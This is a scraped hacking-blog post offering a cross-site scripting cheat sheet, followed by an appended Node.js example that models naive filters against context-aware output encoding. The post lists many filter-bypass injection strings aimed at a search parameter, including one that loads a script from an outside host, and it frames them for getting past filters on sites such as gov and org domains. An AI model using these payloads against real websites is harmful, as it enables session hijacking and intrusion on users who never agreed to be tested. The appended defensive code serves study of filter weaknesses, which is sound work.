Cross Site Scripting (XSS) Cheat Sheet - Readers Choice!! Hacking Alert
11:04 PM cracking, hacking, hacking tutorial, sql injection tool, xss attack
OWASP lists SQL injection and XSS as the two most common vulnerabilities in web
pages and web apps. We have covered SQL injection quite extensively, so I decided
to write on XSS.
Cross Site Scripting, or XSS, is a web application attack that involves injecting a
piece of malicious code into a vulnerable web application or web page. The attacker
injects a client-side script, mainly through the web browser, so that it reaches the other
users of that website. This attack can open several doors for the attacker, ranging
from session hijacking to entire database compromise.
Stored XSS is more dangerous and complicated than a reflected XSS attack. In a
stored or persistent XSS attack, the malicious script is stored on the target server
and is activated once another user clicks on it. For example, consider a forum where
the attacker posts a message containing a link to a malicious script. When another
user views the message and clicks the link, the script runs and carries out the
attack.
The attacker can craft a malicious script, such as a cookie-stealing script of the form
<script>alert(document.cookie);</script>, and steal the victim's cookies to perform
session hijacking.
1 of 4 6/13/17, 4:47 PM
Cross site scripting(XSS) Cheat Sheet - Readers Choice!! ~ Hacking Alert http://hackingalert.blogspot.fr/2011/12/cross-site-scripting-cheat-sheet...
DOM (Document Object Model) based XSS attacks try to exploit the structure of
the page in which they reside. The attacker tries to trick the browser into executing
JavaScript or HTML code of his choice. Unlike the other two XSS attacks, a DOM
based attack takes advantage of vulnerable JavaScript that executes directly in
the user's browser.
Consider the following piece of code:
<html><font color="Red"><b>Pwned</b></font></html>
<script>alert('xss')</script>
"><script>alert('xss')</script>
Now notice that the filter script above only covers a few strings, while there are a
bunch of other ways and strings to inject a malicious request.
It only filters '<', '>' and '/', which leaves hackers a vast number of other strings for
injecting malicious code.
Now the question is: since '<' and '>' are filtered, how will we be able to inject
JavaScript or HTML code?
Well, the answer is quite easy: JavaScript can be executed by placing ' or " before the
original script.
For instance,
')alert('xss');
Secondly,
");alert('xss');
Some webmasters filter a lot more than this; such filtering is especially common on
important sites like gov and org sites.
But it all depends on their pattern. If they are doing the filtering in JavaScript, we can of
course just alter the page, but what if the filtration is not in JavaScript but in HTML,
PHP or even ASP?
Nothing is impossible: we will try to get as much information about the filtration as
we can.
Suppose a server filters more than just the common strings, in a way that checks for
the malicious string at the beginning or at the end of the input in order to abort it. This,
of course, can be bypassed too!
helloworld<script>alert('xss')</script>
The above script will bypass filtration on a server that checks for the malicious string
only at the beginning.
2 of 4 6/13/17, 4:47 PM
Cross site scripting(XSS) Cheat Sheet - Readers Choice!! ~ Hacking Alert http://hackingalert.blogspot.fr/2011/12/cross-site-scripting-cheat-sheet...
helloworld<script>alert('xss')<script>helloworld
This will bypass filtration on a server that checks at the beginning, at the end,
or at both ends!
This kind of filtration is mostly not common, so it can't be of much use.
Some webmasters also filter the word 'xss', so it is advisable to use some other
message for the alert.
<script>alert('hello world')</script>
Some webmasters simply define a pattern for a cross-site scripting script that is
likely to be common.
For this case, I will list here the full array of strings to inject for bypassing the
filtration.
victim.com/search.php?query="><script>alert('hello world')</script>
victim.com/search.php?query="><script>alert("hello world")</script>
victim.com/search.php?query="><script>alert("hello world");</script>
victim.com/search.php?query="><script>alert(/hello world");</script>
victim.com/search.php?query=//"><script>alert(/hello world/);</script>
victim.com/search.php?query=abc<script>alert(/hello world/);</script>
victim.com/search.php?query=abc"><script>alert(/hello world/);</script>
victim.com/search.php?query=abc"></script><script>alert(/hello world/);</script>
victim.com/search.php?query=abc//abc"></script>alert(/hello world/);</script>
victim.com/search.php?query=000"><script></script><script>alert(1337);</script>
victim.com/search.php?query=000abc</script><script>alert(/1337/);</script>
victim.com/search.php?query=--<script>"></script>alert(/1337/);</script>
victim.com/search.php?query=pwned<script>document.write('abc');</script>
victim.com/search.php?query=pwned</script><script>document.write(1337);</script>
victim.com/search.php?query=pwned')alert(1337);//
victim.com/search.php?query=pwned";)alert(1337);//
victim.com/search.php?query=pwned");alert(/pwned/);//
victim.com/search.php?query=pwned//"></script><script>location.href='javascript:alert(/pwned/);</script>
victim.com/search.php?query="><img src='javascript:alert('xss');'>
victim.com/search.php?query="><script src='http://malicous js'</script>
These are a few simple and advanced scripts that can be used to check for XSS
vulnerability. There are several automated tools available as well, but I would
recommend that you first learn the manual method so that you clearly
understand the attack vector; later on you can switch to automated tools. If you
know any other XSS script that is missing from this tutorial, you can add it in the
comment box and I will update the tutorial with it along with your name.
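As an added, defender's-side example (this is not code from the original post or from any site it mentions): a Node.js script that models the blocklist filters described above and contrasts them with context-aware output encoding. The two filter functions, naiveCharFilter (strips only '<', '>' and '/') and naivePatternFilter (rejects the word 'xss' and a literal '<script>' tag), are my own hypothetical models of the filters the post describes, not the filters of any real site. The sample payloads are a handful of the post's own test strings; the script reports, without executing anything, which ones escape the HTML attribute or JavaScript string context they are echoed into, and shows that proper encoding for each context leaves none of them able to break out.

```javascript
// Hypothetical model of the character blocklist the post describes: it strips
// only '<', '>' and '/', so quotes and everything else pass straight through.
function naiveCharFilter(input) {
  return String(input).replace(/[<>\/]/g, '');
}

// Hypothetical model of the keyword/pattern filter the post mentions: reject the
// word 'xss' and the literal '<script>' tag, and nothing else.
function naivePatternFilter(input) {
  return /xss|<script>/i.test(input) ? '' : String(input);
}

// Proper defence for HTML text and quoted-attribute contexts: entity-encode every
// character that can change the HTML parser's state (the set OWASP recommends).
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;' };
function escapeHtml(input) {
  return String(input).replace(/[&<>"'\/]/g, (ch) => HTML_ESCAPES[ch]);
}

// Proper defence for a JavaScript string-literal context: JSON-encode the value,
// then also escape '<' so a '</script>' inside it can never close the script block.
function escapeJsString(input) {
  return JSON.stringify(String(input)).replace(/</g, '\\u003c');
}

// The two places a search.php-style page commonly echoes the query:
//   1. a double-quoted HTML attribute   value="..."
//   2. a JavaScript string literal      var q = ...;
// The vulnerable path applies the blocklist and pastes the result between quotes;
// the hardened path applies the encoder that matches the context.
function renderAttribute(query, hardened) {
  return hardened ? escapeHtml(query) : naiveCharFilter(query);
}
function renderJsLiteral(query, hardened) {
  return hardened ? escapeJsString(query) : "'" + naiveCharFilter(query) + "'";
}

// A double-quoted attribute value is broken out of if the rendered value still
// contains a raw '"' (the only character that terminates it).
function attributeBreaksOut(rendered) {
  return rendered.includes('"');
}

// A JS string literal is broken out of if the text between its quotes contains an
// unescaped quote of the same kind, a raw newline, or '</script' (which the HTML
// parser honours even inside a string). This is a scan only; no code is executed.
function jsLiteralBreaksOut(rendered) {
  const quote = rendered[0];
  if ((quote !== "'" && quote !== '"') || rendered[rendered.length - 1] !== quote) return true;
  const body = rendered.slice(1, -1);
  if (/<\/script/i.test(body) || /[\r\n]/.test(body)) return true;
  for (let i = 0; i < body.length; i++) {
    if (body[i] === '\\') { i++; continue; }   // skip the escaped character
    if (body[i] === quote) return true;       // unescaped terminator
  }
  return false;
}

// Constructed sample input: a few of the post's own test strings plus a benign query.
const SAMPLE_PAYLOADS = [
  `"><script>alert('hello world')</script>`,  // tag injection from the post's list
  `')alert('xss');`,                           // the post's quote-based bypass
  `pwned");alert(/pwned/);//`,
  `helloworld<script>alert('xss')</script>`,   // the post's prefix-check bypass
  `plain search term`,
];

// Run every payload through both pipelines and report which contexts it escapes.
function evaluate(payloads = SAMPLE_PAYLOADS) {
  return payloads.map((p) => ({
    payload: p,
    attrBreaksVulnerable: attributeBreaksOut(renderAttribute(p, false)),
    attrBreaksHardened: attributeBreaksOut(renderAttribute(p, true)),
    jsBreaksVulnerable: jsLiteralBreaksOut(renderJsLiteral(p, false)),
    jsBreaksHardened: jsLiteralBreaksOut(renderJsLiteral(p, true)),
    patternFilterBlocks: naivePatternFilter(p) === '',
  }));
}

for (const row of evaluate()) console.log(row);
```

Two things the table makes visible that the post only states in passing: the character blocklist lets the quote-based payload through untouched, and the keyword filter misses any payload that avoids the word 'xss' and the exact '<script>' spelling. The hardened columns are false for every payload because the encoder is chosen per output context rather than by guessing which characters an attacker might use.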
Special Thanks : str0ke,USMAN,tushy,Hackman,shubham,Fix
DARKLORD!!
8 comments:
http://hackxfbx.blogspot.in/